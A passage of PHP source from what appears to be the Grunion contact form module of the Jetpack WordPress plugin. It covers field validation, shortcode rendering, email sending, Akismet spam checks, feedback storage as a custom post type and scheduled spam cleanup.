$contact_form_errors, $contact_form_values; $field_id = $field['id']; $field_value = isset($_POST[ $field_id ]) ? stripslashes($_POST[ $field_id ]) : ''; # pay special attention to required email fields if ( $field['required'] && $field['type'] == 'email' ) { if ( !is_email( $field_value ) ) { if ( !is_wp_error( $contact_form_errors ) ) { $contact_form_errors = new WP_Error(); } $contact_form_errors->add( $field_id, sprintf( __( '%s requires a valid email address', 'jetpack' ), $field['label'] ) ); } } elseif ( $field['required'] && !trim($field_value) ) { if ( !is_wp_error($contact_form_errors) ) { $contact_form_errors = new WP_Error(); } $contact_form_errors->add( $field_id, sprintf( __( '%s is required', 'jetpack' ), $field['label'] ) ); } $contact_form_values[ $field_id ] = $field_value; } function contact_form_is_error( $field_id ) { global $contact_form_errors; return ( is_wp_error( $contact_form_errors ) && $contact_form_errors->get_error_message( $field_id ) ); } // generic shortcode that handles all of the major input types // this parses the field attributes into an array that is used by other functions for rendering, validation etc function contact_form_field( $atts, $content, $tag ) { global $contact_form_fields, $contact_form_last_id, $grunion_form; $field = shortcode_atts( array( 'label' => null, 'type' => 'text', 'required' => false, 'options' => array(), 'id' => null, 'default' => null, ), $atts); // special default for subject field if ( $field['type'] == 'subject' && is_null($field['default']) ) $field['default'] = $grunion_form->subject; // allow required=1 or required=true if ( $field['required'] == '1' || strtolower($field['required']) == 'true' ) $field['required'] = true; else $field['required'] = false; // parse out comma-separated options list if ( !empty($field['options']) && is_string($field['options']) ) $field['options'] = array_map('trim', explode(',', $field['options'])); // make a unique field ID based on the label, with an incrementing number if needed to avoid clashes $id = $field['id']; if ( empty($id) ) { $id = sanitize_title_with_dashes( $contact_form_last_id . '-' . $field['label'] ); $i = 0; $max_tries = 12; while ( isset( $contact_form_fields[ $id ] ) ) { $i++; $id = sanitize_title_with_dashes( $contact_form_last_id . '-' . $field['label'] . '-' . $i ); if ( $i > $max_tries ) { break; } } $field['id'] = $id; } $contact_form_fields[ $id ] = $field; if ( isset( $_POST['contact-form-id'] ) && $_POST['contact-form-id'] == $contact_form_last_id ) contact_form_validate_field( $field ); return contact_form_render_field( $field ); } add_shortcode('contact-field', 'contact_form_field'); function contact_form_shortcode( $atts, $content ) { global $post; $default_to = get_option( 'admin_email' ); $default_subject = "[" . get_option( 'blogname' ) . "]"; if ( !empty( $atts['widget'] ) && $atts['widget'] ) { $default_subject .= " Sidebar"; } elseif ( $post->ID ) { $default_subject .= " ". wp_kses( $post->post_title, array() ); $post_author = get_userdata( $post->post_author ); $default_to = $post_author->user_email; } extract( shortcode_atts( array( 'to' => $default_to, 'subject' => $default_subject, 'show_subject' => 'no', // only used in back-compat mode 'widget' => 0 //This is not exposed to the user. Works with contact_form_widget_atts ), $atts ) ); $widget = esc_attr( $widget ); if ( ( function_exists( 'faux_faux' ) && faux_faux() ) || is_feed() ) return '[contact-form]'; global $wp_query, $grunion_form, $contact_form_errors, $contact_form_values, $user_identity, $contact_form_last_id, $contact_form_message; // used to store attributes, configuration etc for access by contact-field shortcodes $grunion_form = new stdClass(); $grunion_form->to = $to; $grunion_form->subject = $subject; $grunion_form->show_subject = $show_subject; if ( $widget ) $id = 'widget-' . $widget; elseif ( is_singular() ) $id = $wp_query->get_queried_object_id(); else $id = $GLOBALS['post']->ID; if ( !$id ) // something terrible has happened return '[contact-form]'; if ( $id == $contact_form_last_id ) return; else $contact_form_last_id = $id; if ( is_user_logged_in() ) { ob_start(); wp_nonce_field( 'contact-form_' . $id ); $nonce = ob_get_contents(); $nonce = "\t\t$nonce\n"; ob_end_clean(); } else { $nonce = ''; } $body = contact_form_parse( $content ); $r = "<div id='contact-form-$id'>\n"; $errors = array(); if ( is_wp_error( $contact_form_errors ) && $errors = (array) $contact_form_errors->get_error_codes() ) { $r .= "<div class='form-error'>\n<h3>" . __( 'Error!', 'jetpack' ) . "</h3>\n<ul class='form-errors'>\n"; foreach ( $contact_form_errors->get_error_messages() as $message ) $r .= "\t<li class='form-error-message' style='color: red;'>$message</li>\n"; $r .= "</ul>\n</div>\n\n"; } $action = apply_filters( 'grunion_contact_form_form_action', get_permalink( $post->ID ) . "#contact-form-$id", $post, $id ); $r .= "<form action='" . esc_url( $action ) . "' method='post' class='contact-form commentsblock'>\n"; $r .= $body; $r .= "\t<p class='contact-submit'>\n"; $r .= "\t\t<input type='submit' value='" . __( "Submit »", 'jetpack' ) . "' class='pushbutton-wide'/>\n"; $r .= $nonce; $r .= "\t\t<input type='hidden' name='contact-form-id' value='$id' />\n"; $r .= "\t</p>\n"; $r .= "</form>\n</div>"; if ( !isset( $_POST['contact-form-id'] ) || $_POST['contact-form-id'] != $contact_form_last_id ) return $r; if ( is_wp_error($contact_form_errors) ) return $r; $emails = str_replace( ' ', '', $to ); $emails = explode( ',', $emails ); foreach ( (array) $emails as $email ) { if ( is_email( $email ) && ( !function_exists( 'is_email_address_unsafe' ) || !is_email_address_unsafe( $email ) ) ) $valid_emails[] = $email; } $to = ( $valid_emails ) ? $valid_emails : $default_to; $message_sent = contact_form_send_message( $to, $subject, $widget ); if ( is_array( $contact_form_values ) ) extract( $contact_form_values ); if ( !isset( $comment_content ) ) $comment_content = ''; else $comment_content = wp_kses( $comment_content, array() ); $r = "<div id='contact-form-$id'>\n"; $errors = array(); if ( is_wp_error( $contact_form_errors ) && $errors = (array) $contact_form_errors->get_error_codes() ) : $r .= "<div class='form-error'>\n<h3>" . __( 'Error!', 'jetpack' ) . "</h3>\n<p>\n"; foreach ( $contact_form_errors->get_error_messages() as $message ) $r .= "\t$message<br />\n"; $r .= "</p>\n</div>\n\n"; else : $r_success_message = "<h3>" . __( 'Message Sent', 'jetpack' ) . "</h3>\n\n"; $r_success_message .= wp_kses($contact_form_message, array('br' => array(), 'blockquote' => array())); $r .= apply_filters( 'grunion_contact_form_success_message', $r_success_message ); $r .= "</div>"; // Reset for multiple contact forms. Hacky $contact_form_values['comment_content'] = ''; return $r; endif; return $r; } add_shortcode( 'contact-form', 'contact_form_shortcode' ); function contact_form_send_message( $to, $subject, $widget ) { global $post; if ( !isset( $_POST['contact-form-id'] ) ) return; if ( ( $widget && 'widget-' . $widget != $_POST['contact-form-id'] ) || ( !$widget && $post->ID != $_POST['contact-form-id'] ) ) return; if ( is_user_logged_in() ) { if ( $widget ) check_admin_referer( 'contact-form_widget-' . $widget ); else check_admin_referer( 'contact-form_' . $post->ID ); } global $contact_form_values, $contact_form_errors, $current_user, $user_identity; global $contact_form_fields, $contact_form_message; // compact the fields and values into an array of Label => Value pairs // also find values for comment_author_email and other significant fields $all_values = $extra_values = array(); foreach ( $contact_form_fields as $id => $field ) { if ( $field['type'] == 'email' && !isset( $comment_author_email ) ) { $comment_author_email = $contact_form_values[ $id ]; $comment_author_email_label = $field['label']; } elseif ( $field['type'] == 'name' && !isset( $comment_author ) ) { $comment_author = $contact_form_values[ $id ]; $comment_author_label = $field['label']; } elseif ( $field['type'] == 'url' && !isset( $comment_author_url ) ) { $comment_author_url = $contact_form_values[ $id ]; $comment_author_url_label = $field['label']; } elseif ( $field['type'] == 'subject' && !isset( $contact_form_subject ) ) { $contact_form_subject = $contact_form_values[$id]; $contact_form_subject_label = $field['label']; } elseif ( $field['type'] == 'textarea' && !isset( $comment_content ) ) { $comment_content = $contact_form_values[ $id ]; $comment_content_label = $field['label']; } else { $extra_values[ $field['label'] ] = $contact_form_values[ $id ]; } $all_values[ $field['label'] ] = $contact_form_values[ $id ]; } /* $contact_form_values = array(); $contact_form_errors = new WP_Error(); list($comment_author, $comment_author_email, $comment_author_url) = is_user_logged_in() ? add_magic_quotes( array( $user_identity, $current_user->data->user_email, $current_user->data->user_url ) ) : array( $_POST['comment_author'], $_POST['comment_author_email'], $_POST['comment_author_url'] ); */ $comment_author = stripslashes( apply_filters( 'pre_comment_author_name', $comment_author ) ); if ( !empty( $comment_author_email ) ) { $comment_author_email = stripslashes( apply_filters( 'pre_comment_author_email', $comment_author_email ) ); } else { $comment_author_email = ''; $comment_author_email_label = ''; } if ( !empty( $comment_author_url ) ) { $comment_author_url = stripslashes( apply_filters( 'pre_comment_author_url', $comment_author_url ) ); if ( 'http://' == $comment_author_url ) { $comment_author_url = ''; } } else { $comment_author_url = ''; $comment_author_url_label = ''; } $comment_content = stripslashes( $comment_content ); $comment_content = trim( wp_kses( $comment_content, array() ) ); if ( empty( $contact_form_subject ) ) $contact_form_subject = trim( wp_kses( $subject, array() ) ); else $contact_form_subject = trim( wp_kses( $contact_form_subject, array() ) ); $comment_author_IP = $_SERVER['REMOTE_ADDR']; $vars = array( 'comment_author', 'comment_author_email', 'comment_author_url', 'contact_form_subject', 'comment_author_IP' ); foreach ( $vars as $var ) $$var = str_replace( array("\n", "\r" ), '', $$var ); // I don't know if it's possible to inject this $vars[] = 'comment_content'; $contact_form_values = compact( $vars ); $spam = ''; $akismet_values = contact_form_prepare_for_akismet( $contact_form_values ); $is_spam = apply_filters( 'contact_form_is_spam', $akismet_values ); if ( is_wp_error( $is_spam ) ) return; // abort else if ( $is_spam === TRUE ) $spam = '***SPAM*** '; if ( !$comment_author ) $comment_author = $comment_author_email; $to = apply_filters( 'contact_form_to', $to ); foreach ( (array) $to as $to_key => $to_value ) { $to[$to_key] = wp_kses( $to_value, array() ); } $from_email_addr = $to[0]; if ( !empty( $comment_author_email ) ) { $from_email_addr = $comment_author_email; } $headers = 'From: ' . wp_kses( $comment_author, array() ) . ' <' . wp_kses( $from_email_addr, array() ) . ">\r\n" . 'Reply-To: ' . wp_kses( $from_email_addr, array() ) . "\r\n" . "Content-Type: text/plain; charset=\"" . get_option('blog_charset') . "\""; $subject = apply_filters( 'contact_form_subject', $contact_form_subject ); $subject = wp_kses( $subject, array() ); $time = date_i18n( __( 'l F j, Y \a\t g:i a', 'jetpack' ), current_time( 'timestamp' ) ); $extra_content = ''; $extra_content_br = ''; foreach ( $extra_values as $label => $value ) { $extra_content .= $label . ': ' . trim($value) . "\n"; $extra_content_br .= wp_kses( $label, array() ) . ': ' . wp_kses( trim($value), array() ) . "<br />"; } $message = "$comment_author_label: $comment_author\n"; if ( !empty( $comment_author_email ) ) { $message .= "$comment_author_email_label: $comment_author_email\n"; } if ( !empty( $comment_author_url ) ) { $message .= "$comment_author_url_label: $comment_author_url\n"; } $message .= "$comment_content_label: $comment_content\n"; $message .= $extra_content . "\n"; $message .= __( "Time:", 'jetpack' ) . " " . $time . "\n"; $message .= __( "IP Address:", 'jetpack' ) . " " . $comment_author_IP . "\n"; $message .= __( "Contact Form URL:", 'jetpack' ) . " " . get_permalink( $post->ID ) . "\n"; // Construct message that is returned to user $contact_form_message = "<blockquote>"; if (isset($comment_author_label)) $contact_form_message .= wp_kses( $comment_author_label, array() ) . ": " . wp_kses( $comment_author, array() ) . "<br />"; if ( !empty( $comment_author_email ) ) $contact_form_message .= wp_kses( $comment_author_email_label, array() ) . ": " . wp_kses( $comment_author_email, array() ) . "<br />"; if ( !empty( $comment_author_url ) ) $contact_form_message .= wp_kses( $comment_author_url_label, array() ) . ": " . wp_kses( $comment_author_url, array() ) . "<br />"; if ( !empty( $contact_form_subject_label ) ) { $contact_form_message .= wp_kses( $contact_form_subject_label, array() ) . ": " . wp_kses( $contact_form_subject, array() ) . "<br />"; } if (isset($comment_content_label)) $contact_form_message .= wp_kses( $comment_content_label, array() ) . ": " . wp_kses( $comment_content, array() ) . "<br />"; if (isset($extra_content_br)) $contact_form_message .= $extra_content_br; $contact_form_message .= "</blockquote><br /><br />"; if ( is_user_logged_in() ) { $message .= "\n"; $message .= sprintf( __( 'Sent by a verified %s user.', 'jetpack' ), isset( $GLOBALS['current_site']->site_name ) && $GLOBALS['current_site']->site_name ? $GLOBALS['current_site']->site_name : '"' . get_option( 'blogname' ) . '"' ); } else { $message .= __( "Sent by an unverified visitor to your site.", 'jetpack' ); } $message = apply_filters( 'contact_form_message', $message ); $message = wp_kses( $message, array() ); // keep a copy of the feedback as a custom post type $feedback_mysql_time = current_time( 'mysql' ); $feedback_title = "{$comment_author} - {$feedback_mysql_time}"; $feedback_status = 'publish'; if ( $is_spam === TRUE ) $feedback_status = 'spam'; foreach ( (array) $akismet_values as $av_key => $av_value ) { $akismet_values[$av_key] = wp_kses( $av_value, array() ); } foreach ( (array) $all_values as $all_key => $all_value ) { $all_values[$all_key] = wp_kses( $all_value, array() ); } foreach ( (array) $extra_values as $ev_key => $ev_value ) { $ev_values[$ev_key] = wp_kses( $ev_value, array() ); } # We need to make sure that the post author is always zero for contact # form submissions. This prevents export/import from trying to create # new users based on form submissions from people who were logged in # at the time. # # Unfortunately wp_insert_post() tries very hard to make sure the post # author gets the currently logged in user id. That is how we ended up # with this work around. global $do_grunion_insert; $do_grunion_insert = TRUE; add_filter( 'wp_insert_post_data', 'grunion_insert_filter', 10, 2 ); $post_id = wp_insert_post( array( 'post_date' => $feedback_mysql_time, 'post_type' => 'feedback', 'post_status' => $feedback_status, 'post_parent' => $post->ID, 'post_title' => wp_kses( $feedback_title, array() ), 'post_content' => wp_kses($comment_content . "\n<!--more-->\n" . "AUTHOR: {$comment_author}\nAUTHOR EMAIL: {$comment_author_email}\nAUTHOR URL: {$comment_author_url}\nSUBJECT: {$contact_form_subject}\nIP: {$comment_author_IP}\n" . print_r( $all_values, TRUE ), array()), // so that search will pick up this data 'post_name' => md5( $feedback_title ) ) ); # once insert has finished we don't need this filter any more remove_filter( 'wp_insert_post_data', 'grunion_insert_filter' ); $do_grunion_insert = FALSE; update_post_meta( $post_id, '_feedback_author', wp_kses( $comment_author, array() ) ); update_post_meta( $post_id, '_feedback_author_email', wp_kses( $comment_author_email, array() ) ); update_post_meta( $post_id, '_feedback_author_url', wp_kses( $comment_author_url, array() ) ); update_post_meta( $post_id, '_feedback_subject', wp_kses( $contact_form_subject, array() ) ); update_post_meta( $post_id, '_feedback_ip', wp_kses( $comment_author_IP, array() ) ); update_post_meta( $post_id, '_feedback_contact_form_url', wp_kses( get_permalink( $post->ID ), array() ) ); update_post_meta( $post_id, '_feedback_all_fields', $all_values ); update_post_meta( $post_id, '_feedback_extra_fields', $extra_values ); update_post_meta( $post_id, '_feedback_akismet_values', $akismet_values ); update_post_meta( $post_id, '_feedback_email', array( 'to' => $to, 'subject' => $subject, 'message' => $message, 'headers' => $headers ) ); do_action( 'grunion_pre_message_sent', $post_id, $all_values, $extra_values ); # schedule deletes of old spam feedbacks if ( !wp_next_scheduled( 'grunion_scheduled_delete' ) ) { wp_schedule_event( time() + 250, 'daily', 'grunion_scheduled_delete' ); } if ( $is_spam !== TRUE ) return wp_mail( $to, "{$spam}{$subject}", $message, $headers ); elseif ( apply_filters( 'grunion_still_email_spam', FALSE ) == TRUE ) return wp_mail( $to, "{$spam}{$subject}", $message, $headers ); } // populate an array with all values necessary to submit a NEW comment to Akismet // note that this includes the current user_ip etc, so this should only be called when accepting a new item via $_POST function contact_form_prepare_for_akismet( $form ) { $form['comment_type'] = 'contact_form'; $form['user_ip'] = preg_replace( '/[^0-9., ]/', '', $_SERVER['REMOTE_ADDR'] ); $form['user_agent'] = $_SERVER['HTTP_USER_AGENT']; $form['referrer'] = $_SERVER['HTTP_REFERER']; $form['blog'] = get_option( 'home' ); $ignore = array( 'HTTP_COOKIE' ); foreach ( $_SERVER as $k => $value ) if ( !in_array( $k, $ignore ) && is_string( $value ) ) $form["$k"] = $value; return $form; } // submit an array to Akismet. If you're accepting a new item via $_POST, run it through contact_form_prepare_for_akismet() first function contact_form_is_spam_akismet( $form ) { if ( !function_exists( 'akismet_http_post' ) ) return false; global $akismet_api_host, $akismet_api_port; $query_string = ''; foreach ( array_keys( $form ) as $k ) $query_string .= $k . '=' . urlencode( $form[$k] ) . '&'; $response = akismet_http_post( $query_string, $akismet_api_host, '/1.1/comment-check', $akismet_api_port ); $result = false; if ( 'true' == trim( $response[1] ) ) // 'true' is spam $result = true; return apply_filters( 'contact_form_is_spam_akismet', $result, $form ); } // submit a comment as either spam or ham // $as should be a string (either 'spam' or 'ham'), $form should be the comment array function contact_form_akismet_submit( $as, $form ) { global $akismet_api_host, $akismet_api_port; if ( !in_array( $as, array( 'ham', 'spam' ) ) ) return false; $query_string = ''; foreach ( array_keys( $form ) as $k ) $query_string .= $k . '=' . urlencode( $form[$k] ) . '&'; $response = akismet_http_post( $query_string, $akismet_api_host, '/1.1/submit-'.$as, $akismet_api_port ); return trim( $response[1] ); } function contact_form_widget_atts( $text ) { static $widget = 0; $widget++; return preg_replace( '/\[contact-form([^a-zA-Z_-])/', '[contact-form widget="' . $widget . '"\\1', $text ); } add_filter( 'widget_text', 'contact_form_widget_atts', 0 ); function contact_form_widget_shortcode_hack( $text ) { if ( !preg_match( '/\[contact-form([^a-zA-Z_-])/', $text ) ) { return $text; } $old = $GLOBALS['shortcode_tags']; remove_all_shortcodes(); add_shortcode( 'contact-form', 'contact_form_shortcode' ); add_shortcode( 'contact-field', 'contact_form_field' ); $text = do_shortcode( $text ); $GLOBALS['shortcode_tags'] = $old; return $text; } function contact_form_init() { if ( function_exists( 'akismet_http_post' ) ) { add_filter( 'contact_form_is_spam', 'contact_form_is_spam_akismet', 10 ); add_action( 'contact_form_akismet', 'contact_form_akismet_submit', 10, 2 ); } if ( !has_filter( 'widget_text', 'do_shortcode' ) ) add_filter( 'widget_text', 'contact_form_widget_shortcode_hack', 5 ); // custom post type we'll use to keep copies of the feedback items register_post_type( 'feedback', array( 'labels' => array( 'name' => __( 'Feedbacks', 'jetpack' ), 'singular_name' => __( 'Feedback', 'jetpack' ), 'search_items' => __( 'Search Feedback', 'jetpack' ), 'not_found' => __( 'No feedback found', 'jetpack' ), 'not_found_in_trash' => __( 'No feedback found', 'jetpack' ) ), 'menu_icon' => GRUNION_PLUGIN_URL . 'images/grunion-menu.png', 'show_ui' => TRUE, 'show_in_admin_bar' => FALSE, 'public' => FALSE, 'rewrite' => FALSE, 'query_var' => FALSE, 'capability_type' => 'page' ) ); register_post_status( 'spam', array( 'label' => 'Spam', 'public' => FALSE, 'exclude_from_search' => TRUE, 'show_in_admin_all_list' => FALSE, 'label_count' => _n_noop( 'Spam <span class="count">(%s)</span>', 'Spam <span class="count">(%s)</span>', 'jetpack' ), 'protected' => TRUE, '_builtin' => FALSE ) ); /* Can be dequeued by placing the following in wp-content/themes/yourtheme/functions.php * * function remove_grunion_style() { * wp_deregister_style('grunion.css'); * } * add_action('wp_print_styles', 'remove_grunion_style'); */ wp_register_style('grunion.css', GRUNION_PLUGIN_URL . 'css/grunion.css'); } add_action( 'init', 'contact_form_init' ); /** * Add a contact form button to the post composition screen */ add_action( 'media_buttons', 'grunion_media_button', 999 ); function grunion_media_button( ) { global $post_ID, $temp_ID; $iframe_post_id = (int) (0 == $post_ID ? $temp_ID : $post_ID); $title = esc_attr( __( 'Add a custom form', 'jetpack' ) ); $plugin_url = esc_url( GRUNION_PLUGIN_URL ); $site_url = admin_url( "/admin-ajax.php?post_id=$iframe_post_id&grunion=form-builder&action=grunion_form_builder&TB_iframe=true&width=768" ); echo '<a href="' . $site_url . '&id=add_form" class="thickbox" title="' . $title . '"><div class="grunion-menu-button" alt="' . $title . '"></div></a>'; } if ( !empty( $_GET['grunion'] ) && $_GET['grunion'] == 'form-builder' ) { add_action( 'parse_request', 'parse_wp_request' ); add_action( 'wp_ajax_grunion_form_builder', 'parse_wp_request' ); } function parse_wp_request( $wp ) { display_form_view( ); exit; } function display_form_view( ) { require_once GRUNION_PLUGIN_DIR . 'grunion-form-view.php'; } function menu_alter() { echo ' <style> #menu-posts-feedback .wp-menu-image img { display: none; } #adminmenu .menu-icon-feedback:hover div.wp-menu-image, #adminmenu .menu-icon-feedback.wp-has-current-submenu div.wp-menu-image, #adminmenu .menu-icon-feedback.current div.wp-menu-image { background: url("' .GRUNION_PLUGIN_URL . 'images/grunion-menu-hover.png") no-repeat 6px 7px; } #adminmenu .menu-icon-feedback div.wp-menu-image { background: url("' . GRUNION_PLUGIN_URL . 'images/grunion-menu.png") no-repeat 6px 7px; } .grunion-menu-button { background: url("' . GRUNION_PLUGIN_URL . 'images/grunion-form.png") no-repeat; width: 13px; height: 12px; display: inline-block; } @media only screen and (-moz-min-device-pixel-ratio: 1.5), only screen and (-o-min-device-pixel-ratio: 3/2), only screen and (-webkit-min-device-pixel-ratio: 1.5), only screen and (min-device-pixel-ratio: 1.5) { #adminmenu .menu-icon-feedback:hover div.wp-menu-image, #adminmenu .menu-icon-feedback.wp-has-current-submenu div.wp-menu-image, #adminmenu .menu-icon-feedback.current div.wp-menu-image { background: url("' .GRUNION_PLUGIN_URL . 'images/grunion-menu-hover-2x.png") no-repeat 6px 7px; background-size: 15px 16px; } #adminmenu .menu-icon-feedback div.wp-menu-image { background: url("' . GRUNION_PLUGIN_URL . 'images/grunion-menu-2x.png") no-repeat 6px 7px; background-size: 15px 16px; } .grunion-menu-button { background-image: url("' . GRUNION_PLUGIN_URL . 'images/grunion-form-2x.png"); background-size: 13px 12px; vertical-align: bottom; } } </style>'; } add_action('admin_head', 'menu_alter'); function grunion_insert_filter( $data, $postarr ) { global $do_grunion_insert; if ( $do_grunion_insert === TRUE ) { if ( $data['post_type'] == 'feedback' ) { if ( $postarr['post_type'] == 'feedback' ) { $data['post_author'] = 0; } } } return $data; } add_action( 'grunion_scheduled_delete', 'grunion_delete_old_spam' ); function grunion_delete_old_spam() { global $wpdb; $grunion_delete_limit = 100; $now_gmt = current_time( 'mysql', 1 ); $sql = $wpdb->prepare( " SELECT `ID` FROM $wpdb->posts WHERE DATE_SUB( %s, INTERVAL 15 DAY ) > `post_date_gmt` AND `post_type` = 'feedback' AND `post_status` = 'spam' LIMIT %d ", $now_gmt, $grunion_delete_limit ); $post_ids = $wpdb->get_col( $sql ); foreach ( (array) $post_ids as $post_id ) { # force a full delete, skip the trash wp_delete_post( $post_id, TRUE ); } # Arbitrary check points for running OPTIMIZE # nothing special about 5000 or 11 # just trying to periodically recover deleted rows $random_num = mt_rand( 1, 5000 ); if ( apply_filters( 'grunion_optimize_table', ( $random_number == 11 ) ) ) { $wpdb->query( "OPTIMIZE TABLE $wpdb->posts" ); } # if we hit the max then schedule another run if ( count( $post_ids ) >= $grunion_delete_limit ) { wp_schedule_single_event( time() + 700, 'grunion_scheduled_delete' ); } }